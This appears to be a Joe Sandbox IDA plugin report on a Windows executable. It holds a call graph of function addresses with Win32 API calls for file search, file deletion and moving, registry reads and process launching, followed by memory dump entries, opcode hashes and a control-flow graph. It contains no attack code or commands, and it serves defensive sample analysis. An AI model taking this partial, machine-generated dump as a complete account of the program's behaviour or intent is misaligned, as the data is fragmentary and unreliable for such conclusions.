19799->19800 19800->19796 19802 40ccf6 19801->19802 19803 40cd0f 19801->19803 19804 40ccac 124 API calls 19802->19804 19803->19626 19804->19803 19806 40cf39 19805->19806 19806->19650 19807->19530 21657 4195b4 LoadCursorW RegisterClassExW 19808->21657 19810 419645 GetWindowRect GetParent MapWindowPoints 19811 419682 GetParent CreateWindowExW 19810->19811 19812 41967b DestroyWindow 19810->19812 19813 419704 19811->19813 19817 4196c7 19811->19817 19812->19811 19814 419708 ShowWindow UpdateWindow 19813->19814 19815 41971a 19813->19815 19814->19815 19822 40f9a5 19815->19822 21664 418e4e GetTickCount GetTickCount 19815->21664 19817->19822 21658 418ffb 19817->21658 19820 4196e6 ShowWindow SetWindowTextW 19821 41a086 __setenvp 67 API calls 19820->19821 19821->19822 19822->19616 19823->19599 19824->19588 19848 40bd68 19825->19848 19827 40be6e GetWindowRect GetClientRect 19828 40bf4b 19827->19828 19833 40beb2 19827->19833 19829 40bf94 GetSystemMetrics GetWindow 19828->19829 19830 40bf56 GetWindowTextW 19828->19830 19840 40bfb8 19829->19840 19832 40bc10 ctype 102 API calls 19830->19832 19831 40bf8f 19831->19829 19835 40bf7d SetWindowTextW 19832->19835 19833->19831 19836 40bf05 GetWindowLongW 19833->19836 19834 40c094 19834->19677 19835->19829 19837 40bf25 SetWindowPos GetWindowRect 19836->19837 19838 40bf1e 19836->19838 19837->19828 19838->19837 19839 40bfc5 GetWindowTextW 19839->19840 19840->19834 19840->19839 19841 40bc10 ctype 102 API calls 19840->19841 19842 40c076 GetWindow 19840->19842 19843 40c00c GetWindowRect SetWindowPos 19840->19843 19844 40bff6 SetWindowTextW 19841->19844 19842->19834 19842->19840 19843->19842 19844->19840 19846 40b922 19845->19846 19847 40b904 GetWindowLongW SetWindowLongW 19845->19847 19846->19677 19847->19846 19849 40bc10 ctype 102 API calls 19848->19849 19850 40bd8f _wcschr 19849->19850 19850->19827 19852 418d13 DestroyWindow 19851->19852 19853 40cfc4 ShowWindow SendMessageW SendMessageW 19851->19853 19852->19853 19853->19681 19855 40905e __write_nolock 19854->19855 19856 409087 19855->19856 19857 40907e CreateDirectoryW 19855->19857 19875 40902d 19856->19875 19857->19856 19859 4090b6 19857->19859 19861 4090c5 19859->19861 19867 408e15 19859->19867 19861->19691 19862 4090c9 GetLastError 19862->19861 19865 4090a3 19865->19862 19866 4090a7 CreateDirectoryW 19865->19866 19866->19859 19866->19862 19888 41a670 19867->19888 19870 408e64 19870->19861 19871 408e3b 19872 40a5bc 2 API calls 19871->19872 19873 408e4f 19872->19873 19873->19870 19874 408e53 SetFileAttributesW 19873->19874 19874->19870 19890 408dc9 19875->19890 19878 40a5bc 19879 40a5c9 __write_nolock 19878->19879 19887 40a5d3 _wcslen _wcscpy _wcsncpy 19879->19887 19898 40a051 19879->19898 19881 40a5e2 _wcslen 19901 40a4f8 19881->19901 19883 40a5f1 19884 40a684 GetCurrentDirectoryW 19883->19884 19885 40a5f9 19883->19885 19884->19887 19886 40a051 CharUpperW 19885->19886 19886->19887 19887->19865 19889 408e22 SetFileAttributesW 19888->19889 19889->19870 19889->19871 19891 41a670 __write_nolock 19890->19891 19892 408dd6 GetFileAttributesW 19891->19892 19893 408dea 19892->19893 19894 408e0d 19892->19894 19895 40a5bc 2 API calls 19893->19895 19894->19862 19894->19878 19896 408dfe 19895->19896 19896->19894 19897 408e02 GetFileAttributesW 19896->19897 19897->19894 19905 410748 19898->19905 19902 40a503 19901->19902 19903 40a510 19902->19903 19904 40a051 CharUpperW 19902->19904 19903->19883 19904->19903 19906 40a05f 19905->19906 19907 410755 CharUpperW 19905->19907 19906->19881 19907->19906 19909 40d47f __write_nolock 19908->19909 19910 40d513 ExpandEnvironmentStringsW 19909->19910 19911 40d536 19909->19911 19910->19911 19911->19725 19912->19725 19914 40d814 __write_nolock 19913->19914 19915 40d8ae GetDlgItem SetWindowTextW SendMessageW 19914->19915 19916 40d830 RegOpenKeyExW 19914->19916 19915->19725 19916->19915 19917 40d84d RegQueryValueExW 19916->19917 19918 40d8a5 RegCloseKey 19917->19918 19919 40d879 19917->19919 19918->19915 19919->19918 19920->19725 19924 4093a7 19921->19924 19922 409437 19922->19725 19923 4091fe 7 API calls 19923->19924 19924->19922 19924->19923 19926 40a051 CharUpperW 19925->19926 19927 40a542 19926->19927 19928 401b7b _swprintf 101 API calls 19927->19928 19929 40a559 _wcslen _wcschr _wcsncpy 19927->19929 19928->19929 19929->19735 19931 4091e3 19930->19931 19932 4091dc FindClose 19930->19932 19931->19725 19932->19931 19934 40d62b __write_nolock 19933->19934 19935 41cafe _malloc 67 API calls 19934->19935 19936 40d637 19935->19936 19940 40d648 _wcscat _wcslen _wcscpy 19936->19940 19941 40632c 19936->19941 19938 40d472 ExpandEnvironmentStringsW 19938->19940 19939 40d6e8 19939->19725 19940->19938 19940->19939 19946 4062e3 19941->19946 19943 406334 19949 40629a 19943->19949 19953 401bae 19946->19953 19948 4062ed 19948->19943 19951 4062a9 19949->19951 19950 4062c6 19950->19940 19951->19950 19952 41c33f __CxxThrowException@8 RaiseException 19951->19952 19952->19950 19954 4112c0 ctype 119 API calls 19953->19954 19955 401bca 19954->19955 19955->19948 19957 41090e _wcslen 19956->19957 19985 4011a7 19957->19985 19959 410926 _wcscpy 19959->19740 19961 410901 _wcslen 19960->19961 19962 4011a7 125 API calls 19961->19962 19963 410926 _wcscpy 19962->19963 19963->19742 19965 406f27 __EH_prolog 19964->19965 19995 41a41a 19965->19995 19967 406f7e 19970 408152 19967->19970 19971 40815f __write_nolock 19970->19971 19972 4081c6 19971->19972 20103 409444 19971->20103 19976 40822b 19972->19976 19977 409444 8 API calls 19972->19977 20080 407f9d 19972->20080 19974 40826f 19974->19746 19976->19974 19978 4012d0 ctype 119 API calls 19976->19978 19977->19972 19978->19974 19980 406e4b __EH_prolog 19979->19980 19981 406e68 moneypunct 19980->19981 19983 415195 131 API calls 19980->19983 19982 401001 ctype 131 API calls 19981->19982 19984 406e7b 19982->19984 19983->19981 19984->19747 19986 4011b9 19985->19986 19993 401211 19985->19993 19987 4011e2 19986->19987 19988 406381 ctype 119 API calls 19986->19988 19989 41a114 _realloc 72 API calls 19987->19989 19990 4011d8 19988->19990 19991 401202 19989->19991 19992 40632c 120 API calls 19990->19992 19991->19993 19994 40632c 120 API calls 19991->19994 19992->19987 19993->19959 19994->19993 19997 41a424 19995->19997 19996 41cafe _malloc 67 API calls 19996->19997 19997->19996 19998 406f6a 19997->19998 19999 41f85b _malloc 6 API calls 19997->19999 20000 41a440 19997->20000 19998->19967 20007 417214 19998->20007 19999->19997 20004 41c58f __cinit 74 API calls 20000->20004 20006 41a466 20000->20006 20003 41c33f __CxxThrowException@8 RaiseException 20005 41a47e 20003->20005 20004->20006 20013 412180 20006->20013 20008 41721e __EH_prolog 20007->20008 20031 410c7f 20008->20031 20010 4172f5 20040 415371 20010->20040 20016 41d2e8 20013->20016 20017 41218c 20016->20017 20018 41d308 _strlen 20016->20018 20017->20003 20018->20017 20019 41cafe _malloc 67 API calls 20018->20019 20020 41d31b 20019->20020 20020->20017 20022 422456 20020->20022 20023 422467 20022->20023 20024 42246e 20022->20024 20023->20024 20029 422494 20023->20029 20025 41e96e __fptostr 67 API calls 20024->20025 20026 422473 20025->20026 20027 41fcc3 __fptostr 6 API calls 20026->20027 20028 422482 20027->20028 20028->20017 20029->20028 20030 41e96e __fptostr 67 API calls 20029->20030 20030->20026 20046 41a05c 20031->20046 20033 410c89 EnterCriticalSection 20034 410ca6 20033->20034 20035 410ccb LeaveCriticalSection 20033->20035 20036 41a41a 75 API calls 20034->20036 20035->20010 20037 410cb0 20036->20037 20038 410cc6 20037->20038 20047 410b36 20037->20047 20038->20035 20041 4153d5 _memset 20040->20041 20042 41537e _memset 20040->20042 20055 4152c8 20041->20055 20045 4125f7 67 API calls 20042->20045 20045->20041 20046->20033 20048 410b48 InitializeCriticalSection CreateSemaphoreW CreateEventW 20047->20048 20050 410b9f 20048->20050 20051 410bbe 20050->20051 20052 406381 ctype 119 API calls 20050->20052 20051->20038 20053 410bb3 20052->20053 20054 4062f8 ctype RaiseException 20053->20054 20054->20051 20056 415306 20055->20056 20057 4152d4 _memset 20055->20057 20056->19967 20059 414e70 20057->20059 20060 4125f7 67 API calls 20059->20060 20061 414e7f 20060->20061 20062 414ead 20061->20062 20068 414b07 20061->20068 20063 4125f7 67 API calls 20062->20063 20065 414eb8 20063->20065 20066 414edf 20065->20066 20067 414b07 67 API calls 20065->20067 20067->20065 20071 413a09 20068->20071 20076 4125e9 20071->20076 20074 4125e9 ctype 67 API calls 20075 413a1c 20074->20075 20077 4125f5 20076->20077 20078 4125ef 20076->20078 20077->20074 20079 41a086 __setenvp 67 API calls 20078->20079 20079->20077 20081 407fa7 __EH_prolog __write_nolock 20080->20081 20109 401851 20081->20109 20083 407fc4 20115 408695 20083->20115 20088 407ff0 20090 407ff4 20088->20090 20097 408018 _wcscpy 20088->20097 20239 40a2b5 20090->20239 20092 407fff 20252 401228 20092->20252 20097->20092 20100 409444 8 API calls 20097->20100 20102 4080a5 20097->20102 20243 40a3ce 20097->20243 20100->20097 20147 406e89 20102->20147 20104 409459 20103->20104 20105 40945d 20104->20105 21565 4091fe 20104->21565 20105->19971 20107 40946d 20107->20105 20108 409472 FindClose 20107->20108 20108->20105 20110 40185b __EH_prolog 20109->20110 20111 41a41a 75 API calls 20110->20111 20114 4018e6 _memset 20110->20114 20112 4018d3 20111->20112 20113 409dae 126 API calls 20112->20113 20112->20114 20113->20114 20114->20083 20116 4086a0 20115->20116 20117 407fdb 20116->20117 20262 40646e 20116->20262 20117->20092 20119 40145f 20117->20119 20120 401469 __EH_prolog 20119->20120 20271 408c03 20120->20271 20121 40148d 20122 4014ad 20121->20122 20141 401492 _wcscpy 20121->20141 20279 4012f9 20121->20279 20125 4015d8 20122->20125 20129 4015e8 20122->20129 20126 4012d0 ctype 119 API calls 20125->20126 20126->20141 20128 40365b 155 API calls 20128->20129 20129->20128 20135 401647 20129->20135 20129->20141 20136 401672 20135->20136 20137 4012d0 ctype 119 API calls 20135->20137 20135->20141 20136->20141 20290 40117b 20136->20290 20137->20136 20141->20088 20253 401232 __EH_prolog 20252->20253 20257 401261 moneypunct 20253->20257 21558 409d84 20253->21558 20254 4125e9 ctype 67 API calls 20256 401274 20254->20256 20258 4125e9 ctype 67 API calls 20256->20258 20257->20254 20259 40127f 20258->20259 21550 401001 20259->21550 20265 4063b7 20262->20265 20264 406479 20264->20117 20268 4062fd 20265->20268 20267 4063c9 20267->20264 20269 4112c0 ctype 119 API calls 20268->20269 20270 406328 20269->20270 20270->20267 20273 408c1b 20271->20273 20274 408c7d 20273->20274 20275 408c68 20273->20275 20278 408c73 20273->20278 20293 408a28 20273->20293 20277 408a28 5 API calls 20274->20277 20274->20278 20305 406498 20275->20305 20277->20274 20278->20121 20320 401106 20279->20320 20282 408936 20294 408a42 ReadFile 20293->20294 20295 408a37 GetStdHandle 20293->20295 20296 408a5b 20294->20296 20302 408a7b 20294->20302 20295->20294 20310 4089e2 20296->20310 20298 408a62 20299 408a94 20298->20299 20300 408a89 GetLastError 20298->20300 20299->20302 20300->20299 20300->20302 20302->20273 20314 40648a 20305->20314 20311 4089ea 20310->20311 20312 4089ed GetFileType 20310->20312 20311->20298 20313 4089f9 20312->20313 20313->20298 20317 4063f5 20314->20317 20318 4062fd 119 API calls 20317->20318 20319 406407 20318->20319 20321 401118 20320->20321 20328 40116f 20320->20328 20322 401141 20321->20322 20323 406381 ctype 119 API calls 20321->20323 20324 41a114 _realloc 72 API calls 20322->20324 20325 401137 20323->20325 20328->20282 21551 40100b __EH_prolog 21550->21551 21559 409d94 _memset 21558->21559 21560 4125e9 ctype 67 API calls 21559->21560 21561 409da2 ctype 21560->21561 21561->20257 21566 40920b __write_nolock 21565->21566 21567 409223 FindFirstFileW 21566->21567 21568 40928d FindNextFileW 21566->21568 21571 40923a 21567->21571 21576 409271 _clock 21567->21576 21569 4092b0 21568->21569 21570 40929a GetLastError 21568->21570 21569->21576 21570->21569 21572 40a5bc 2 API calls 21571->21572 21573 40924a 21572->21573 21574 409266 GetLastError 21573->21574 21575 40924e FindFirstFileW 21573->21575 21574->21576 21575->21574 21575->21576 21576->20107 21578 41994e 3 API calls 21577->21578 21579 4199db 21578->21579 21580 40d8c4 21579->21580 21581 419991 3 API calls 21579->21581 21580->19753 21580->19754 21581->21580 21582->19757 21584 41999a GetDC 21583->21584 21585 4199c0 21583->21585 21584->21585 21586 4199a9 GetDeviceCaps ReleaseDC 21584->21586 21585->19763 21586->21585 21588 419957 GetDC 21587->21588 21590 41997d 21587->21590 21589 419966 GetDeviceCaps ReleaseDC 21588->21589 21588->21590 21589->21590 21590->19763 21604 4199f3 GetDC GetDeviceCaps ReleaseDC 21591->21604 21593 419a29 21594 419a40 GetObjectW 21593->21594 21595 419a2d 21593->21595 21597 419a65 21594->21597 21598 419a67 CoCreateInstance 21594->21598 21605 419889 GetDC CreateCompatibleDC CreateCompatibleDC GetObjectW 21595->21605 21597->21598 21599 40d96d SendMessageW 21598->21599 21600 419a89 _memset 21598->21600 21599->19759 21599->19767 21600->21599 21601 419aff CreateDIBSection 21600->21601 21601->21599 21602 419b4c 21601->21602 21602->21599 21603 419ba0 DeleteObject 21602->21603 21603->21599 21604->21593 21606 4198d0 21605->21606 21607 4198d3 9 API calls 21605->21607 21606->21607 21607->21599 21608->19774 21610 408695 119 API calls 21609->21610 21611 401a55 21610->21611 21612 40145f 155 API calls 21611->21612 21614 401a59 21611->21614 21613 401a66 21612->21613 21613->21614 21615 4012d0 ctype 119 API calls 21613->21615 21618 401797 21614->21618 21616 401a75 21615->21616 21617 4087ca 121 API calls 21616->21617 21617->21614 21619 4017a1 __EH_prolog 21618->21619 21620 4017b2 21619->21620 21621 40117b 122 API calls 21619->21621 21620->19786 21620->19789 21622 4017c2 21621->21622 21623 4017f3 21622->21623 21624 4017cd 21622->21624 21629 403723 21623->21629 21625 40365b 155 API calls 21624->21625 21625->21620 21632 403729 21629->21632 21630 40365b 155 API calls 21630->21632 21631 401811 21631->21620 21633 401332 21631->21633 21632->21630 21632->21631 21634 40133c __EH_prolog 21633->21634 21635 402c53 193 API calls 21634->21635 21636 40135e 21635->21636 21637 401362 21636->21637 21638 401377 21636->21638 21641 41a086 __setenvp 67 API calls 21637->21641 21649 40136f 21637->21649 21650 4012b5 21638->21650 21641->21649 21644 4116c2 MultiByteToWideChar 21645 40139b _wcslen 21644->21645 21646 401318 125 API calls 21645->21646 21647 4013e7 21646->21647 21648 41a086 __setenvp 67 API calls 21647->21648 21647->21649 21648->21649 21649->21620 21651 401106 125 API calls 21650->21651 21652 4012bf 21651->21652 21653 401318 21652->21653 21654 401321 21653->21654 21655 40132a 21653->21655 21656 4011a7 125 API calls 21654->21656 21655->21644 21655->21645 21656->21655 21657->19810 21659 41900c _wcslen 21658->21659 21660 41cafe _malloc 67 API calls 21659->21660 21661 419016 21660->21661 21662 419173 21661->21662 21663 411a07 CompareStringW 21661->21663 21662->19820 21662->19822 21663->21661 21665 418e73 21664->21665 21666 418ec8 VariantInit 21665->21666 21668 418e8c PeekMessageW 21665->21668 21667 418ef8 21666->21667 21667->19822 21669 418ebf GetTickCount 21668->21669 21670 418e9e TranslateMessage DispatchMessageW GetMessageW 21668->21670 21669->21665 21670->21669 21671 40eb79 21673 40eb7f 21671->21673 21682 40e593 _wcscat _wcslen _wcsrchr _wcscpy 21671->21682 21672 40d472 ExpandEnvironmentStringsW 21672->21682 21673->21682 21702 40e156 21673->21702 21674 40f11b 21677 40e89c SetWindowTextW 21677->21682 21679 40d61e 121 API calls 21679->21682 21680 41a114 _realloc 72 API calls 21680->21682 21681 40e93a RegOpenKeyExW 21681->21682 21683 40e956 RegQueryValueExW RegCloseKey 21681->21683 21682->21672 21682->21674 21682->21677 21682->21679 21682->21680 21682->21681 21684 409396 7 API calls 21682->21684 21685 41a086 __setenvp 67 API calls 21682->21685 21687 4091d1 FindClose 21682->21687 21691 40d807 3 API calls 21682->21691 21697 40ea91 SendMessageW 21682->21697 21699 40e683 _memset _wcslen 21682->21699 21701 4119e6 CompareStringW 21682->21701 21726 419819 GetCurrentDirectoryW 21682->21726 21683->21682 21684->21682 21685->21682 21686 40e688 SetFileAttributesW 21688 40e746 GetFileAttributesW 21686->21688 21686->21699 21687->21682 21689 40e754 DeleteFileW 21688->21689 21688->21699 21689->21699 21690 40a52d 102 API calls 21690->21699 21693 40ea50 GetDlgItem SetWindowTextW SendMessageW 21691->21693 21692 409396 7 API calls 21692->21699 21693->21682 21694 401b7b _swprintf 101 API calls 21695 40e786 GetFileAttributesW 21694->21695 21696 40e797 MoveFileW 21695->21696 21695->21699 21698 40e7af MoveFileExW 21696->21698 21696->21699 21697->21682 21698->21699 21699->21682 21699->21686 21699->21690 21699->21692 21699->21694 21700 40e722 SHFileOperationW 21699->21700 21700->21688 21701->21682 21704 40e163 _memset _wcslen __write_nolock 21702->21704 21703 40e370 21703->21682 21704->21703 21705 40e24c 21704->21705 21727 4119e6 CompareStringW 21704->21727 21706 40902d 4 API calls 21705->21706 21708 40e25f 21706->21708 21709 40e280 ShellExecuteExW 21708->21709 21728 40a769 21708->21728 21709->21703 21711 40e292 21709->21711 21713 40e2d1 WaitForInputIdle 21711->21713 21714 40e2ba IsWindowVisible 21711->21714 21715 40e312 CloseHandle 21711->21715 21712 40e277 21712->21709 21736 40d548 WaitForSingleObject 21713->21736 21714->21713 21716 40e2c7 ShowWindow 21714->21716 21718 40e320 21715->21718 21724 40e32d 21715->21724 21716->21713 21740 4119e6 CompareStringW 21718->21740 21720 40e2ef GetExitCodeProcess 21720->21715 21722 40e300 21720->21722 21722->21715 21723 40e30d 21722->21723 21723->21715 21724->21703 21725 40e369 ShowWindow 21724->21725 21725->21703 21726->21682 21727->21705 21729 40a776 __write_nolock 21728->21729 21730 40a789 GetFullPathNameW 21729->21730 21735 40a7d9 21729->21735 21731 40a7aa 21730->21731 21732 40a5bc 2 API calls 21731->21732 21731->21735 21733 40a7be 21732->21733 21734 40a7c2 GetFullPathNameW 21733->21734 21733->21735 21734->21735 21735->21712 21737 40d57d 21736->21737 21738 40d581 21737->21738 21739 40d564 PeekMessageW WaitForSingleObject 21737->21739 21738->21715 21738->21720 21739->21737 21740->21724 23592 41e58e 23594 41e59a __mtinitlocknum 23592->23594 23593 41e5b2 23597 41e5c0 23593->23597 23598 41a086 __setenvp 67 API calls 23593->23598 23594->23593 23595 41e69c __mtinitlocknum 23594->23595 23596 41a086 __setenvp 67 API calls 23594->23596 23596->23593 23599 41e5ce 23597->23599 23600 41a086 __setenvp 67 API calls 23597->23600 23598->23597 23601 41e5dc 23599->23601 23602 41a086 __setenvp 67 API calls 23599->23602 23600->23599 23603 41e5ea 23601->23603 23604 41a086 __setenvp 67 API calls 23601->23604 23602->23601 23605 41e5f8 23603->23605 23606 41a086 __setenvp 67 API calls 23603->23606 23604->23603 23607 41e606 23605->23607 23608 41a086 __setenvp 67 API calls 23605->23608 23606->23605 23609 41e617 23607->23609 23610 41a086 __setenvp 67 API calls 23607->23610 23608->23607 23611 41eb63 __lock 67 API calls 23609->23611 23610->23609 23612 41e61f 23611->23612 23613 41e62b InterlockedDecrement 23612->23613 23619 41e644 23612->23619 23615 41e636 23613->23615 23613->23619 23617 41a086 __setenvp 67 API calls 23615->23617 23615->23619 23617->23619 23618 41eb63 __lock 67 API calls 23620 41e658 23618->23620 23628 41e6a8 23619->23628 23621 41e689 23620->23621 23631 421dfc 23620->23631 23675 41e6b4 23621->23675 23625 41a086 __setenvp 67 API calls 23625->23595 23678 41ea89 LeaveCriticalSection 23628->23678 23630 41e651 23630->23618 23632 41e66d 23631->23632 23633 421e0d InterlockedDecrement 23631->23633 23632->23621 23645 421c24 23632->23645 23634 421e22 InterlockedDecrement 23633->23634 23635 421e25 23633->23635 23634->23635 23636 421e32 23635->23636 23637 421e2f InterlockedDecrement 23635->23637 23638 421e3f 23636->23638 23639 421e3c InterlockedDecrement 23636->23639 23637->23636 23640 421e49 InterlockedDecrement 23638->23640 23642 421e4c 23638->23642 23639->23638 23640->23642 23641 421e65 InterlockedDecrement 23641->23642 23642->23641 23643 421e75 InterlockedDecrement 23642->23643 23644 421e80 InterlockedDecrement 23642->23644 23643->23642 23644->23632 23646 421ca8 23645->23646 23652 421c3b 23645->23652 23647 421cf5 23646->23647 23648 41a086 __setenvp 67 API calls 23646->23648 23662 421d1c 23647->23662 23703 4257ae 23647->23703 23650 421cc9 23648->23650 23655 41a086 __setenvp 67 API calls 23650->23655 23652->23646 23654 421c6f 23652->23654 23657 41a086 __setenvp 67 API calls 23652->23657 23653 421c90 23660 41a086 __setenvp 67 API calls 23653->23660 23654->23653 23665 41a086 __setenvp 67 API calls 23654->23665 23659 421cdc 23655->23659 23656 41a086 __setenvp 67 API calls 23656->23662 23663 421c64 23657->23663 23658 421d61 23664 41a086 __setenvp 67 API calls 23658->23664 23666 41a086 __setenvp 67 API calls 23659->23666 23661 421c9d 23660->23661 23668 41a086 __setenvp 67 API calls 23661->23668 23662->23658 23667 41a086 67 API calls __setenvp 23662->23667 23679 425988 23663->23679 23670 421d67 23664->23670 23671 421c85 23665->23671 23672 421cea 23666->23672 23667->23662 23668->23646 23670->23621 23695 425943 23671->23695 23674 41a086 __setenvp 67 API calls 23672->23674 23674->23647 23791 41ea89 LeaveCriticalSection 23675->23791 23677 41e696 23677->23625 23678->23630 23680 425995 23679->23680 23694 425a12 23679->23694 23681 4259a6 23680->23681 23682 41a086 __setenvp 67 API calls 23680->23682 23683 4259b8 23681->23683 23685 41a086 __setenvp 67 API calls 23681->23685 23682->23681 23684 4259ca 23683->23684 23686 41a086 __setenvp 67 API calls 23683->23686 23687 4259dc 23684->23687 23688 41a086 __setenvp 67 API calls 23684->23688 23685->23683 23686->23684 23689 4259ee 23687->23689 23690 41a086 __setenvp 67 API calls 23687->23690 23688->23687 23691 41a086 __setenvp 67 API calls 23689->23691 23693 425a00 23689->23693 23690->23689 23691->23693 23692 41a086 __setenvp 67 API calls 23692->23694 23693->23692 23693->23694 23694->23654 23696 425950 23695->23696 23697 425984 23695->23697 23698 425960 23696->23698 23699 41a086 __setenvp 67 API calls 23696->23699 23697->23653 23700 425972 23698->23700 23701 41a086 __setenvp 67 API calls 23698->23701 23699->23698 23700->23697 23702 41a086 __setenvp 67 API calls 23700->23702 23701->23700 23702->23697 23704 421d15 23703->23704 23705 4257bf 23703->23705 23704->23656 23706 41a086 __setenvp 67 API calls 23705->23706 23707 4257c7 23706->23707 23708 41a086 __setenvp 67 API calls 23707->23708 23709 4257cf 23708->23709 23710 41a086 __setenvp 67 API calls 23709->23710 23711 4257d7 23710->23711 23712 41a086 __setenvp 67 API calls 23711->23712 23713 4257df 23712->23713 23714 41a086 __setenvp 67 API calls 23713->23714 23715 4257e7 23714->23715 23716 41a086 __setenvp 67 API calls 23715->23716 23717 4257ef 23716->23717 23718 41a086 __setenvp 67 API calls 23717->23718 23719 4257f6 23718->23719 23720 41a086 __setenvp 67 API calls 23719->23720 23721 4257fe 23720->23721 23722 41a086 __setenvp 67 API calls 23721->23722 23723 425806 23722->23723 23724 41a086 __setenvp 67 API calls 23723->23724 23725 42580e 23724->23725 23726 41a086 __setenvp 67 API calls 23725->23726 23727 425816 23726->23727 23728 41a086 __setenvp 67 API calls 23727->23728 23729 42581e 23728->23729 23730 41a086 __setenvp 67 API calls 23729->23730 23731 425826 23730->23731 23732 41a086 __setenvp 67 API calls 23731->23732 23733 42582e 23732->23733 23734 41a086 __setenvp 67 API calls 23733->23734 23735 425836 23734->23735 23736 41a086 __setenvp 67 API calls 23735->23736 23737 42583e 23736->23737 23738 41a086 __setenvp 67 API calls 23737->23738 23739 425849 23738->23739 23740 41a086 __setenvp 67 API calls 23739->23740 23741 425851 23740->23741 23742 41a086 __setenvp 67 API calls 23741->23742 23743 425859 23742->23743 23744 41a086 __setenvp 67 API calls 23743->23744 23745 425861 23744->23745 23746 41a086 __setenvp 67 API calls 23745->23746 23747 425869 23746->23747 23748 41a086 __setenvp 67 API calls 23747->23748 23749 425871 23748->23749 23750 41a086 __setenvp 67 API calls 23749->23750 23751 425879 23750->23751 23752 41a086 __setenvp 67 API calls 23751->23752 23753 425881 23752->23753 23754 41a086 __setenvp 67 API calls 23753->23754 23755 425889 23754->23755 23756 41a086 __setenvp 67 API calls 23755->23756 23757 425891 23756->23757 23758 41a086 __setenvp 67 API calls 23757->23758 23759 425899 23758->23759 23760 41a086 __setenvp 67 API calls 23759->23760 23761 4258a1 23760->23761 23762 41a086 __setenvp 67 API calls 23761->23762 23763 4258a9 23762->23763 23791->23677 23800 41c39b 23803 41c38b 23800->23803 23802 41c3a8 moneypunct 23806 420a93 23803->23806 23805 41c399 23805->23802 23807 420a9f __mtinitlocknum 23806->23807 23808 41eb63 __lock 67 API calls 23807->23808 23812 420aa6 23808->23812 23810 420ad6 23813 41a086 __setenvp 67 API calls 23810->23813 23811 420af0 __mtinitlocknum 23811->23805 23812->23810 23814 41a086 __setenvp 67 API calls 23812->23814 23815 420adf 23812->23815 23813->23815 23814->23810 23816 420afa 23815->23816 23819 41ea89 LeaveCriticalSection 23816->23819 23818 420b01 23818->23811 23819->23818
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00401CCA
                                                    • _strlen.LIBCMT ref: 0040223B
                                                      • Part of subcall function 004116C2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,00001FFF,?,?,004022C0,00000000,?,00000800,?,00001FFF,?), ref: 004116DE
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00402397
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                    • String ID: CMT
                                                    • API String ID: 1706572503-2756464174
                                                    • Opcode ID: 2feb5e0aeadc5ca7cbacf738d6aa850c754736e98c9ef072c0c30c09e793d41b
                                                    • Instruction ID: 0bdb99cf2f2834eb1d66cf39fda15bef7b84f78c00dedbc0b980d21a0ab13425
                                                    • Opcode Fuzzy Hash: 2feb5e0aeadc5ca7cbacf738d6aa850c754736e98c9ef072c0c30c09e793d41b
                                                    • Instruction Fuzzy Hash: B16202319006848FCF25DF64C8997EE7BB1AF14304F08447EE986BB2C6DB795985CB68

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 960 4091fe-409221 call 41a670 963 409223-409234 FindFirstFileW 960->963 964 40928d-409298 FindNextFileW 960->964 967 4092ba-409380 call 410792 call 40a272 call 41a750 call 410ee5 * 3 963->967 968 40923a-40924c call 40a5bc 963->968 965 4092b0-4092b4 964->965 966 40929a-4092aa GetLastError 964->966 965->967 969 409385-409393 965->969 966->965 967->969 975 409266-40926f GetLastError 968->975 976 40924e-409264 FindFirstFileW 968->976 978 409280 975->978 979 409271-409274 975->979 976->967 976->975 980 409282-409288 978->980 979->978 982 409276-409279 979->982 980->969 982->978 984 40927b-40927e 982->984 984->980
                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(?,?,00000800,?,?,?,0040946D,000000FF,?,?,?,?,004081A3,?,?,00000000), ref: 0040922C
                                                    • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,0040946D,000000FF,?,?,?,?,004081A3,?,?,00000000), ref: 0040925C
                                                    • GetLastError.KERNEL32(?,?,00000800,?,0040946D,000000FF,?,?,?,?,004081A3,?,?,00000000,?,00000800), ref: 00409266
                                                    • FindNextFileW.KERNEL32(000000FF,?,00000800,?,?,?,0040946D,000000FF,?,?,?,?,004081A3,?,?,00000000), ref: 00409290
                                                    • GetLastError.KERNEL32(?,0040946D,000000FF,?,?,?,?,004081A3,?,?,00000000,?,00000800), ref: 0040929E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
